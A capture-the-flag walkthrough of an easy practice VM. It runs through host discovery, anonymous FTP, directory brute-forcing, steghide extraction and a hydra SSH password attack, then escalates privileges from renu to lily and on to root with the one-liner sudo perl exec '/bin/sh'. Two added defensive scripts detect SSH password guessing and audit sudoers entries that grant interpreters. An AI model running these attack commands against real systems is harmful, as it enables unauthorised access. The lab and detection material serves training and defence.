Difficulty level: Easy
Aim: Get root access and capture x3 flags.
The target IP is not provided, but can be easily discovered using arp-scan:
sudo arp-scan --interface=eth1 192.168.56.100/24
With the target identified we can run nmap to discover open ports/services:
nmap -sC -sV -vvv 192.168.56.116
From this we can see the following ports and services:
- port 21/tcp - FTP - (vsftpd 3.0.3 - with anonymous login allowed)
- port 22/tcp - SSH - OpenSSH 7.9p1
- port 80/tcp - HTTP - Apache httpd 2.4.38
The anonymous FTP sounds interesting, and you may have noticed that nmap also identified a file named 'trytofind.jpg' during its scan. We'll connect to the FTP service and download this:
ftp 192.168.56.116
anonymous
ls -la
get trytofind.jpg
quit
It's not much use at the moment, but going off past experience there is likely to be some steganography involved here.
Let's move on to the HTTP service and check that in our browser:
Again, not much here, but let's throw gobuster at it to brute-force some directories:
gobuster dir -u http://192.168.56.116 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
We've found a blogs directory to explore:
Viewing the source code for this page reveals another hidden directory:
The source code for this page gives us a secret key:
We can use this key with steghide to extract hidden information from the JPG image we found earlier - the result is a file named data.txt:
steghide extract -sf trytofind.jpg
cat data.txt
OK, we have discovered a user named renu and been told that this account has a weak password, so let's throw hydra at this and attempt to brute-force the SSH service:
hydra -l renu -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.116
Success! We have a password for renu and can now login via SSH:
ssh renu@192.168.56.116
(password: 987654321)
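From the defender's side, the hydra run above leaves a very recognisable trace in the target's sshd log: a burst of "Failed password" entries for one account from one source, followed by an "Accepted password" for the same pair. The script below is an added example for this write-up, not code from the original post. It parses constructed auth.log lines (the hostname "target" and the source addresses 192.168.56.50 and 192.168.56.20 are assumed sample values, not from the box) and flags source/user pairs that exceed a failure threshold, noting whether a later password login succeeded.

```python
"""Detect SSH password guessing in sshd auth.log lines (added example).

The sample log is constructed to resemble a hydra run against the 'renu'
account followed by one successful login; 192.168.56.50 is an assumed
attacker address used only for this example.
"""
import re
from collections import defaultdict

# Constructed sample of what /var/log/auth.log shows during a brute-force run.
SAMPLE_AUTH_LOG = """\
Jan 10 10:00:01 target sshd[1201]: Failed password for renu from 192.168.56.50 port 40001 ssh2
Jan 10 10:00:01 target sshd[1203]: Failed password for renu from 192.168.56.50 port 40002 ssh2
Jan 10 10:00:02 target sshd[1205]: Failed password for renu from 192.168.56.50 port 40003 ssh2
Jan 10 10:00:02 target sshd[1207]: Failed password for renu from 192.168.56.50 port 40004 ssh2
Jan 10 10:00:03 target sshd[1209]: Failed password for renu from 192.168.56.50 port 40005 ssh2
Jan 10 10:00:03 target sshd[1211]: Accepted password for renu from 192.168.56.50 port 40006 ssh2
Jan 10 10:05:00 target sshd[1300]: Failed password for lily from 192.168.56.20 port 50000 ssh2
Jan 10 10:05:10 target sshd[1302]: Accepted publickey for lily from 192.168.56.20 port 50001 ssh2
"""

# Matches the standard OpenSSH result line; "invalid user" appears for unknown accounts.
AUTH_RE = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) (?P<method>password|publickey) "
    r"for (?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port \d+"
)


def parse_auth_log(text):
    """Return a list of dicts (result, method, user, src) for each sshd auth line."""
    events = []
    for line in text.splitlines():
        m = AUTH_RE.search(line)
        if m:
            events.append(m.groupdict())
    return events


def detect_password_guessing(events, threshold=5):
    """Flag (src, user) pairs with at least `threshold` password failures.

    Each finding records the failure count and whether a password login for
    the same pair succeeded after the failures, which is the signature of a
    guess that eventually landed.
    """
    failures = defaultdict(int)
    success_after = set()
    for ev in events:
        key = (ev["src"], ev["user"])
        if ev["result"] == "Failed" and ev["method"] == "password":
            failures[key] += 1
        elif ev["result"] == "Accepted" and ev["method"] == "password" and failures[key] > 0:
            success_after.add(key)
    return {
        key: {"failures": n, "later_success": key in success_after}
        for key, n in failures.items()
        if n >= threshold
    }


if __name__ == "__main__":
    for (src, user), info in detect_password_guessing(parse_auth_log(SAMPLE_AUTH_LOG)).items():
        print(f"{src} -> {user}: {info['failures']} failures, later success: {info['later_success']}")
```

The threshold is deliberately low for the sample; in practice it would be tuned per environment, and the single failure for lily from a different source is correctly left alone because it is followed by a key-based, not password-based, login.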
The first flag can be found within the home directory of renu:
ls -la
cat user1.txt
Further enumeration finds a user named lily, and that it is possible to access this user's home directory, where we can find the second flag:
cd ..
ls -la
cd lily
ls -la
cat user2.txt
The current user renu has no sudo privileges, so it is likely we need to escalate to lily before we can go further.
The home directory for lily contains a .ssh folder with an authorized_keys file. The contents of this file show that renu can login via SSH as lily without requiring a password:
ssh lily@192.168.56.116
Great! We have escalated our privileges to lily.
Checking the sudo rights for lily, we can see that this user can run the /usr/bin/perl binary as root.
We can take advantage of this to elevate our privileges and spawn a root shell:
sudo perl -e 'exec "/bin/sh";'
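Both privilege-escalation steps on this box come down to configuration that a host audit can catch: a sudo rule that grants an interpreter as root (any argument-restricted rule is moot once the binary can run arbitrary code), and an authorized_keys file in one user's home that trusts a key belonging to another local account. The script below is an added example for this write-up, not code from the original post. It audits constructed sample data modelled on the box; the sudoers text, the NOPASSWD tag, the key blob, the "renu@target" comment, the extra "backup" account and the list of shell-capable binaries are all this example's own assumptions, not facts taken from the machine.

```python
"""Audit sudoers rules and cross-user authorized_keys trust (added example).

All sample data below is constructed for this example: the sudoers fragment
mirrors the 'lily may run /usr/bin/perl as root' finding, and the
authorized_keys entry mirrors 'renu may log in as lily'.
"""
import re

# Binaries that give the caller arbitrary command execution once run as root.
# Assumed starting list for this example; extend it from your own baseline.
SHELL_CAPABLE = {
    "perl", "python", "python3", "ruby", "sh", "bash", "dash", "zsh",
    "vi", "vim", "less", "more", "awk", "find", "env",
}

SAMPLE_SUDOERS = """\
# constructed /etc/sudoers fragment
root    ALL=(ALL:ALL) ALL
lily    ALL=(root) NOPASSWD: /usr/bin/perl
backup  ALL=(root) /usr/bin/rsync
"""

# user HOST=(runas) [TAG: ...] cmd1, cmd2   (the common sudoers user-spec shape)
SUDOERS_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)=\((?P<runas>[^)]*)\)\s*"
    r"(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$"
)


def audit_sudoers(text):
    """Return rules (other than root's) that grant ALL or a shell-capable binary."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = SUDOERS_RE.match(line)
        if not m or m.group("user") == "root":
            continue
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            binary = cmd.split()[0].rsplit("/", 1)[-1]   # basename of the first token
            if binary == "ALL" or binary in SHELL_CAPABLE:
                findings.append({
                    "user": m.group("user"),
                    "runas": m.group("runas"),
                    "command": cmd,
                    "nopasswd": "NOPASSWD:" in m.group("tags"),
                })
    return findings


# Constructed: {owner: contents of ~owner/.ssh/authorized_keys}
SAMPLE_AUTHORIZED_KEYS = {
    "lily": "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQConstructedKeyBlobForExample renu@target\n",
    "renu": "",
}
LOCAL_USERS = {"root", "renu", "lily", "backup"}


def audit_authorized_keys(keys_by_owner, local_users):
    """Flag keys whose comment names a different local account.

    This is a heuristic: the comment is free text, so a hit should be confirmed
    against the named user's own public key before acting on it. Lines with a
    leading options field (e.g. command="...") are not parsed here.
    """
    findings = []
    for owner, content in keys_by_owner.items():
        for line in content.splitlines():
            parts = line.split()
            if len(parts) < 3:          # type, blob, comment; no comment means nothing to match
                continue
            comment = parts[-1]
            named = comment.split("@", 1)[0]
            if named in local_users and named != owner:
                findings.append({"owner": owner, "trusts": named, "comment": comment})
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print("sudo:", f)
    for f in audit_authorized_keys(SAMPLE_AUTHORIZED_KEYS, LOCAL_USERS):
        print("ssh trust:", f)
```

Run against a real host, the same two functions would take `/etc/sudoers` (plus `/etc/sudoers.d/*`) and each home directory's `.ssh/authorized_keys`; the rsync rule in the sample is not flagged, which shows the check targets the interpreter class rather than sudo rules in general.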
Finally, we can switch into the /root directory and obtain the final flag:
cd /root
ls -la
cat .root.txt
Please feel free to contact me via Twitter and thanks for reading.